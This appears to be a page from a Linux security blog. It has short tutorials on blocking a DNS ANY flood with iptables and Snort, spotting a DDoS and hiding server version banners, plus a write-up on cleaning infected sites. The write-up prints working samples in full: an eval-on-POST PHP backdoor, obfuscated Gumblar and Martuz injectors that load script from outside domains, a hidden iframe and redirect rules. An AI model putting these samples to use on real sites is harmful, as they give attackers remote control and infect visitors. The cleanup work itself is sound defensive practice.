Who's Online
We have 66 guests and one member online
Products and Services
Security
Security
- Details
- Parent Category: Security
- Hits: 2416
Whats Is My IP Address, a nice tool to find your ip address.
Many users are behind firewalls proxy or nat equipments so they need to know what is their public ip address. Here it is:
{{myip}}
- Details
- Parent Category: Security
- Hits: 6769
|
|
|
Today i met a new challenge , to defend against the UDP isc.org DNS Query attack.
The attack looks like this:
20 0.090201 211.146.85.194 86.122.87.170 DNS Standard query ANY isc.org 46 0.167341 211.146.85.194 86.122.87.170 DNS Standard query ANY isc.org 67 0.240729 211.146.85.194 86.122.87.170 DNS Standard query ANY isc.org 82 0.283842 211.146.85.194 86.122.87.170 DNS Standard query ANY isc.org 122 0.413971 211.146.85.194 86.122.87.170 DNS Standard query ANY isc.org 126 0.421386 211.146.85.194 86.122.87.170 DNS Standard query ANY isc.org
This is how you can protect yourself:
Linux:
# iptables -A INPUT -p udp -m string --hex-string "|03697363036f726700|" --algo bm --to 65535 -j DROP
or
# iptables -A INPUT -p udp -m string --hex-string "|6973633f6f72673f|" --algo bm --to 65535 -j DROP
Snort rulles:
alert udp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS isc.org DDoS"; content:"|03 69 73 63 03 6f 72 67 00|"; reference:linuxexpert.ro,369; classtype:attempted-dos; sid:4000002; rev:1; fwsam: src, 1 day;)
Also you must secure your nameservers:
Open /etc/named.conf
Look for line:
// query-source address * port 53;
below it , insert the following lines.
version “Bind”;
allow-recursion { trusted; };
allow-notify { trusted; };
allow-transfer { trusted; };
This will disable recursion for other ips than trusted.
|
|
|
|
Note:
We use Hosting and VPS Hosting, from:
www.star-host.org
We like and trust them.
Good prices, high security.
|
- Details
- Parent Category: Security
- Hits: 2654
In this tutorial I'll show you some tricks to find out by yourself if you are under DDOS attack or not.
Here are some usefull Linux commands:
#netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
To find if there is large number of HTTP process running use the command:
#ps -aux|grep HTTP|wc -l
#netstat -lpn|grep :80 |awk '{print $5}'|sort
- Details
- Parent Category: Security
- Hits: 239
|
|
|
In this tutorial I'll show you how to Hide Apache & PHP Software Version:
In otder to hide Apache Header Information you have to change in httpd.conf following settings:
ServerTokens Os
ServerSignature On
to:
ServerTokens Prod or ServerTokens ProductOnly
ServerSignature Off
Don't forget to restart apache.
For PHP Version Details you need to edit the php.ini and change
expose_php On
to
expose_php Off
Now you need to restart your apache server
After those change your apache server is no longer show any Header Information
|
|
|
|
Note:
We use Hosting and VPS Hosting, from:
www.star-host.org
We like and trust them.
Good prices, high security.
|
- Details
- Parent Category: Security
- Hits: 5217
|
|
|
Your site has been banned by Google because it contain viruses, trojans, or other malware?
Here is a nice tutorial that will help you to remove all this bad stuff.
Few days ago i had to remove malware from a site. After i've downloaded the hole site to my computer, i've start
looking into the php files(the site was made in php)
Here is how it look:
# cat class.database.php
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO3ZhciBHWmFjPXVuZXNjYXBlKCgndl82MXJfMjBhXzNkXzIyU2NyXzY5cHRFXzZlXzY3aW5fNjVfMjJfMmNiXzNkXzIyXzU2XzY1cl83M2lvbigpK18yMl8yY2pfM2RfMjJfMjJfMmNfNzVfM2RuXzYxXzc2aWdhdG9yXzJldXNlcl80MWdlbnRfM2JpZl8yOCh1XzJlaW5kZXhPXzY2KF8yMldpbl8yMilfM2VfMzApXzI2XzI2KHVfMmVfNjluZGV4XzRmZl8yOF8yMk5fNTRfMjA2XzIyKV8zYzApXzI2XzI2KGRfNmZfNjN1bV82NW50XzJlY29va2lfNjVfMmVpXzZlZGV4XzRmXzY2KF8yMm1fNjlfNjVrXzNkXzMxXzIyKV8zY18zMClfMjZfMjZfMjhfNzR5XzcwXzY1b182Nl8yOHpydnp0c18yOV8yMV8zZF83NHlwZW9mKF8yMkFfMjIpKSlfN2J6cnZfN2F0c18zZF8yMkFfMjJfM2JldmFfNmMoXzIyaWYoXzc3XzY5bmRvd18yZV8yMithK18yMilqXzNkaitfMjJfMmJhK18yMk1ham9fNzJfMjIrYithXzJiXzIyTV82OW5vcl8yMitiK2FfMmJfMjJCdWlfNmNkXzIyK2IrXzIyal8zYl8yMilfM2JfNjRvY183NV82ZGVudF8yZV83N3JfNjl0ZV8yOF8yMl8zY3NjcmlwdF8yMHNyY18zZF8yZl8yZmd1bWJsYXJfMmVjbl8yZnJzc18yZl8zZmlkXzNkXzIyK182YStfMjJfM2VfM2NfNWNfMmZzY183Ml82OV83MF83NF8zZV8yMilfM2JfN2QnKS5yZXBsYWNlKC9fL2csdFdWKSk7ZXZhbChHWmFjKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>
#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s
*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s)
;}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=
preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS[
'tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);
$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp
_lkojfghx2(); ?><?php/*Database class*/class database {var $error = null;// Set DB_URLfunction database($url = '') {$this->db_url = $url;// Connect to database$this->connect();// Check for database connection errorif($this->is_error()) {die($this->get_error());}}// Connect to the databasefunction connect() {$status = $this->db_handle = mysql_connect(DB_HOST, DB_USERNAME, DB_PASSWORD);if(mysql_error()) {$this->connected = false;$this->error = mysql_error();} else {if(!mysql_select_db(DB_NAME)) {$this->connected = false;$this->error = mysql_error();} else {$this->connected = true;}}return $this->connected;}// Disconnect from the databasefunction disconnect() {if(isset($this->Database)) {mysql_close();return true;} else {return false;}}// Run a queryfunction query($statement) {$mysql = new mysql();$mysql->query($statement);if($mysql->getError()) {$this->set_error($mysql->getError());return null;} else {return $mysql;}}// Gets the first column of the first rowfunction get_one($statement) {$fetch_row = mysql_fetch_row(mysql_query($statement));$result = $fetch_row[0];if(mysql_error()) {$this->set_error(mysql_error());return null;} else {return $result;}}// Set the DB errorfunction set_error($message = null) {global $TABLE_DOES_NOT_EXIST, $TABLE_UNKNOWN;$this->error = $message;if(strpos($message, 'no such table')) {$this->error_type = $TABLE_DOES_NOT_EXIST;} else {$this->error_type = $TABLE_UNKNOWN;}}// Return true if there was an errorfunction is_error() {return (!empty($this->error)) ? true : false;}// Return the errorfunction get_error() {return $this->error;}}class mysql {var $error = null;// Run a queryfunction query($statement) {$this->result = mysql_query($statement);$this->error = mysql_error();return $this->result;}// Get the ID generated from the previous INSERT operationfunction getInsertID() {return mysql_insert_id();}// Fetch num rowsfunction numRows() {$val = mysql_num_rows($this->result);$this->error = mysql_error();return $val;}// Fetch rowfunction fetchRow() {$val = mysql_fetch_array($this->result);$this->error = mysql_error();return $val;}// Fetch arrayfunction fetchObject() {$val = mysql_fetch_object($this->result);$this->error = mysql_error();return $val;}// Get errorfunction getError() {if($this->error != null) {return $this->error;} else {return null;}}}$database = new database();?>
See the base64_decode line. I've put the text into a test.php file
<?php$str = 'PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO........';echo base64_decode($str);?>
and the result was in deed a virus code:# php virus_test.php<script language=javascript><!--(function(){var tWV='%';var GZac=unescape(('v_61r_20a_3d_22Scr_69ptE_6e_67in_65_22_2cb_3d_22_56_65r_73ion()+_22_2cj_3d_22_22_2c_75_3dn_61_76igator_2euser_41gent_3bif_28(u_2eindexO_66(_22Win_22)_3e_30)_26_26(u_2e_69ndex_4ff_28_22N_54_206_22)_3c0)_26_26(d_6f_63um_65nt_2ecooki_65_2ei_6edex_4f_66(_22m_69_65k_3d_31_22)_3c_30)_26_26_28_74y_70_65o_66_28zrvzts_29_21_3d_74ypeof(_22A_22)))_7bzrv_7ats_3d_22A_22_3beva_6c(_22if(_77_69ndow_2e_22+a+_22)j_3dj+_22_2ba+_22Majo_72_22+b+a_2b_22M_69nor_22+b+a_2b_22Bui_6cd_22+b+_22j_3b_22)_3b_64oc_75_6dent_2e_77r_69te_28_22_3cscript_20src_3d_2f_2fgumblar_2ecn_2frss_2f_3fid_3d_22+_6a+_22_3e_3c_5c_2fsc_72_69_70_74_3e_22)_3b_7d').replace(/_/g,tWV));eval(GZac)})();--></script>
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://badsite/ [R=301,L]
Example 2 complex:RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://badsite [R,L]
Example 3:Here, i had to remove malware fromIndian Embassy from Greece : http://www.indianembassy.grOne of the infected file: http://indianembassy.gr/greece/pages_greek.html:# cat pages_greek.html<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Flash Page Flip</title>
<meta name="Description" content="Flash Page Flip is best advanced dynamic page flip flash object">
<meta name="Keywords" content="page flip, page flipping, page turn, flip album, flipping book, digital book, online catalog">
<script src="/js/AC_RunActiveContent.js" mce_src="js/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="/js/PopUpWin.js" mce_src="js/PopUpWin.js" type="text/javascript"></script>
<style type="text/css">
<!--
body {
background-color: #ccc;
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
#main{
position:absolute;
top:0px;
left:0px;
width:100%;
height:100%;
}
#max{
position:absolute;
left:0px;
top:550px;
height:50px;
width:200px;
background-image:url('swf/down_banner.gif');
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;
font-weight:bold
}
#red{
width:auto;
height:20px;
}
.style1 {color: #FFFFFF}
-->
</style></head>
<script language=javascript><!--
(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~74Engine~22~2cb~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~67ator~2eus~65rA~67ent~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~26(u~2eind~65xOf~28~22Win~22)~3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~3c0)~26~26(~64oc~75ment~2ec~6foki~65~2eindex~4ff~28~22mie~6b~3d1~22)~3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~6ff(~22A~22~29))~7bzrv~7ats~3d~22A~22~3b~65val~28~22if(window~2e~22+a+~22)~6a~3dj+~22+a~2b~22M~61jo~72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~22+b+~22j~3b~22)~3bdocument~2ewr~69~74e~28~22~3cscript~20~73r~63~3d~2f~2fm~61r~22~2b~22~74uz~2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~3b~7d').replace(dcdP,ufIC));eval(gQOS4)})(/\~/g);
--></script><body>
<div id="main">
<script type="text/javascript">
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','100%','height','100%','src','swf/Magazine','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','bgcolor','#cccccc','allowFullScreen','true','allowScriptAccess','sameDomain','wmode','transparent','movie','swf/Magazine' ); //end AC code
</script><noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="100%" height="100%">
<param name="movie" value="swf/Magazine.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#cccccc" />
<param name="allowFullScreen" value="true" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="wmode" value="transparent"/>
<embed src="/swf/Magazine.swf" mce_src="swf/Magazine.swf" width="100%" height="100%" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" allowFullScreen="true" allowScriptAccess="sameDomain"></embed>
</object></noscript></div>
<div id="max" align="center">
<div id="red"></div>
<span class="style1"><a href="http://www.consagous.com" mce_href="http://www.consagous.com"><font color="#FFFFFF">
www.consagous.com</font></a></span></div>
The virus is called Martuz and is another version of Gumblar virus.You can find infected files using this command:grep -ril unescape "public_html_dir".Beacause the site have 115 afected files, removin by hand was killing me soi've made a script wich remove the bad code from files:# cat clean_Martuz.sh
#!/bin/bash
for i in `grep -ril unescape /sites/*| grep php` ; do
echo "Removing virus from $i";
sleep 1;
sed -e s/"(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~74Engine~22~2cb~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~67ator~2eus~65rA~67ent~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~26(u~2eind~65xOf~28~22Win~22)~3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~3c0)~26~26(~64oc~75ment~2ec~6foki~65~2eindex~4ff~28~22mie~6b~3d1~22)~3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~6ff(~22A~22~29))~7bzrv~7ats~3d~22A~22~3b~65val~28~22if(window~2e~22+a+~22)~6a~3dj+~22+a~2b~22M~61jo~72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~22+b+~22j~3b~22)~3bdocument~2ewr~69~74e~28~22~3cscript~20~73r~63~3d~2f~2fm~61r~22~2b~22~74uz~2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~3b~7d').replace(dcdP,ufIC));eval(gQOS4)})"//g $i > x && mv x $i
done
#Example 4:Of course we never got an iframe example. Today i've just remove an iframe code fromthe site: http://www.xxxxx.com:Let's have a look on one of suspicious files:#cat customization/homepage.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {
color: #666666;
font-weight: bold;
font-style: normal;
}
-->
</style>
</head>
<body><iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169 style="visibility: hidden"></iframe>
<table width="100%" border="0" align="center">
So, the evil code is <iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169style="visibility: hidden"></iframe>.This code was present in every files, including html, js, php. Again sed and regularexpressions saved me:# cat clean_iframe.sh
#!/bin/bash
virus='<iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169style="visibility: hidden"></iframe>'echo "Virus code: $virus"
path="/public_html/"
for i in `grep -ril "$virus" $path/*` ; do
echo "Removing virus from $i";
sleep 1;
sed -e s/'[<]iframe src="http:\/\/b5z.ru:8080\/index.php" mce_src="http:\/\/b5z.ru:8080\/index.php" width=105 height=169style="visibility: hidden"[>][<]\/iframe[>]'//g $i > /tmp/x && mv /tmp/x $i
done
Advices:1)If you are using some in-house PHP scripts, consult the PHP Security Guide2)Write protect server files that should not be modified by your web application(644 permissions on *nix)3)Check your local computers for spyware and viruses.4)Change all passwords.
Note:
We use Hosting and VPS Hosting, from: www.star-host.org
We like and trust them.
Good prices, high security.